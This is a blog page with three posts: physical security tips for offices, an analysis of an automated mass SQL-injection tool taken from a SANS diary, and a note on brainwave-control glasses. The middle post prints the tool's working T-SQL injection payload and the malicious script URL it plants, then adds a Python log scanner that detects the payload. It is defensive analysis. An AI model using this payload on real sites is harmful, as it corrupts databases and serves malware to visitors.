The Most Essential Security Measures.

Posted by: techuptodate  :  Category: Computers, Electronic Devices, Internet, Security, Technology

There are 10 essential physical security measures every organization should take, if you haven’t already done so.

#1: Lock up the server room
The server room is the heart of your physical network, and someone with physical access to the servers, switches, routers, cables and other devices in that room can do enormous damage.

#2: Set up surveillance
No doubt you need a way to know who goes in and out and when.
A better solution than the log book is an authentication system incorporated into the locking devices, so that a smart card, token, or biometric scan is required to unlock the doors, and a record is made of the identity of each person who enters.

A video surveillance camera, placed in a location that makes it difficult to tamper with or disable (or even to find) but gives a good view of persons entering and leaving should supplement the log book or electronic access system. Surveillance cams can monitor continuously, or they can use motion detection technology to record only when someone is moving about. They can even be set up to send e-mail or cell phone notification if motion is detected when it shouldn’t be (such as after hours).

#3: Make sure the most vulnerable devices are in that locked room
Because it’s not just the servers you have to worry about. A hacker can plug a laptop into a hub and use sniffer software to capture data traveling across the network.

#4: Use rack mount servers
Rack mount servers not only take up less server room real estate; they are also easier to secure.

#5: Don’t forget the workstations
Hackers can use any unsecured computer that’s connected to the network to access or delete information that’s important to your business.

#6: Keep intruders from opening the case
Both servers and workstations should be protected from thieves who can open the case and grab the hard drive.

#7: Protect the portables
Handhelds can be locked in a drawer or safe or just slipped into a pocket and carried on your person when you leave the area. Motion sensing alarms such as the one at SecurityKit.com are also available to alert you if your portable is moved.

#8: Pack up the backups
Backing up important data is an essential element in disaster recovery, but don’t forget that the information on those backup tapes, disks, or discs can be stolen and used by someone outside the company.

Don’t overlook the fact that some workers may back up their work on floppy disks, USB keys, or external hard disks. If this practice is allowed or encouraged, be sure to have policies requiring that the backups be locked up at all times.

#9: Disable the drives
If you don’t want employees copying company information to removable media, you can disable or remove floppy drives, USB ports, and other means of connecting external drives.

#10: Protect your printers
You might not think about printers posing a security risk, but many of today’s printers store document contents in their own on-board memories. Also think about the physical security of documents that workers print out, especially extra copies or copies that don’t print perfectly and may be just abandoned at the printer or thrown intact into the trash can where they can be retrieved.

You have to remember that network security starts at the physical level. All the firewalls in the world won’t stop an intruder who is able to gain physical access to your network and computers, so lock up as well as lock down.

Save Your Computing.

Posted by: techuptodate  :  Category: Computers, Security

Back in January there were multiple reports about a large number of web sites being compromised and serving malware, wrote Bojan Zdrnja, on the institute’s blog. “While we had a general idea about what they do during these attacks, and we knew that they were automated, we did not know exactly how the attacks worked, or what tools the attackers used,” Zdrnja wrote. He then offers some helpful advice on how to avoid that.

So, what the tool does is this:

The user can configure the tag that will be inserted on the compromised web sites. By default, the tool we recovered had the following string embedded: http://www.2117966 [dot] net/fuckjp.js. Sounds familiar? See https://isc.sans.org/diary.html?storyid=4139
The tool then checks something with a site in China. My guess at this point in time is that the attackers get paid for this since the tool calls a script pay.asp with an argument SN to verify something.
Now the user can start the tool. It will connect to Google and will search for vulnerable sites with the following query string: inurl:”.asp” inurl:”a=”. The parameter is configurable and the tool can search for many strings. For crawling, the tool uses a built-in embedded browser from bsalsa (http://www.bsalsa.com)
Once the URLs have been identified, the tool tries to attack the web sites with SQL Injection (I still have to analyze this part further to see how it works). The SQL injection string, though, is visible in the file and formatted with the tag defined in the first. Here is how the SQL Injection statement gets formulated
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update
['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+”
”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
%20AS%20NVARCHAR(4000));EXEC(@S);–

The nice thing about this is that we finally managed to confirm that it is SQL Injection that was used in those attacks. The tool has more functionality that we still have to analyze but this is the main purpose.

Check your applications and make sure that they are not vulnerable. We covered this many times in various diaries, so here are few links to online resources that can help with this:

http://www.owasp.org/index.php/Top_10_2007-A2#Protection

http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspx

http://portal.spidynamics.com/blogs/msutton/archive/2006/09/26/How-Prevalent-Are-SQL-Injection-Vulnerabilities_3F00_.aspx

http://erratasec.blogspot.com/2007/08/sql-injection-is-surpisingly-easy.html

Also “The SQL in question uses table cursors (as variable Table_Cursor) to enumerate all tables on Microsoft SQL server and the respective columns that are of type ntext, text, nvarchar, or varchar AND the table type is a user table and not a system table. The code then proceeds to utilize a cursor while loop to iterate through the returned results updating each table.columname concatenating its current value with an arbitrary value (which appears missing in your SQL, it would appear in the [HERE] area of the query part “rtrim(convert(varchar,['+@C+']))+’[HERE]‘”)

The code converts the current data to varchar during concatenation to avoid any cast issues and removes any trailing space to the right of the field value.
The cursor is deallocated after update (how nice of them)”

You can find Bojan’s diary here – http://isc.sans.org/diary.html?storyid=4294
Thanks to him for the great submissions.
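
An added example, not part of the original post or of Bojan’s diary: a Python scan of IIS-style access logs for the DECLARE @S ... CAST(...) ... EXEC(@S) wrapper shown above, which helps find the pages that were targeted. The log lines, addresses, page names and the short hex value are constructed, and the W3C field layout is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Wrapper shape from the post: DECLARE @S NVARCHAR(4000);SET @S=CAST(... AS
# NVARCHAR(4000));EXEC(@S). Variable name and sizes are left flexible.
WRAPPER = re.compile(
    r"declare\s+@(\w+)\s+n?varchar\s*\(\s*\d+\s*\)\s*;"
    r"\s*set\s+@\1\s*=\s*cast\s*\((.*?)\s+as\s+n?varchar\s*\(\s*\d+\s*\)\s*\)\s*;"
    r"\s*exec\s*\(\s*@\1\s*\)",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample in W3C extended format (documentation-range addresses).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2000-01-01 10:00:01 192.0.2.10 GET /news.asp a=12 200",
    "2000-01-01 10:00:05 198.51.100.7 GET /news.asp a=12;DECLARE%20@S%20NVARCHAR(4000);"
    "SET%20@S=CAST(0x41004200%20AS%20NVARCHAR(4000));EXEC(@S);-- 200",
    "2000-01-01 10:00:09 198.51.100.7 GET /item.asp a=5;declare%2520@s%2520nvarchar(4000);"
    "set%2520@s=cast(0x41004200%2520as%2520nvarchar(4000));exec(@s);-- 500",
    "2000-01-01 10:00:12 192.0.2.44 GET /search.asp q=declare+independence 200",
]

def decode(raw, rounds=3):
    """URL-decode repeatedly so double-encoded input (%2520) is normalised."""
    for _ in range(rounds):
        nxt = unquote_plus(raw)
        if nxt == raw:
            break
        raw = nxt
    return raw

def scan(lines):
    """Return one record per request whose query string carries the wrapper."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        m = WRAPPER.search(decode(row.get("cs-uri-query", "")))
        if m:
            blob = m.group(2).strip()
            hits.append({"client": row.get("c-ip"), "page": row.get("cs-uri-stem"),
                         "status": row.get("sc-status"),
                         "blob_is_hex": bool(re.fullmatch(r"0x[0-9a-f]+", blob, re.I))})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Every page that appears in the results takes a parameter that reached the database unfiltered enough to be worth probing, so those are the first places to switch to parameterized queries and to check the text columns for appended content.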

Chance to Be Closer to the Matrix.

Posted by: techuptodate  :  Category: Technology

New software, Cyber MC from Orange Dreams, gives you the chance to be closer to the Matrix. Can you believe it? There are quite a few things about the Cyber MC brainwave management solution that remain unclear to us, but it’s probably for the best. Korean startup Orange Dreams has apparently concocted some sort of eyewear / software combo that can control your brainwaves and calm your nerves.

There are numerous ways to lose weight or quit smoking, but most of those dated methods require will power and a desire for self improvement. With the new approach, Orange Dreams is going to help people who would rather spend money than exert effort. The Korean company’s new Cyber MC glasses aim to help improve your education, lose weight, quit smoking, and relieve stress. If all else fails you can also play games with the glasses.

Details are still thin on how exactly these glasses take advantage of your ‘brain waves’, but it looks as if they flash images in an Orwellian brainwashing fashion. If you are ready to embrace this brave new world, the Cyber MC software and glasses will be available this April.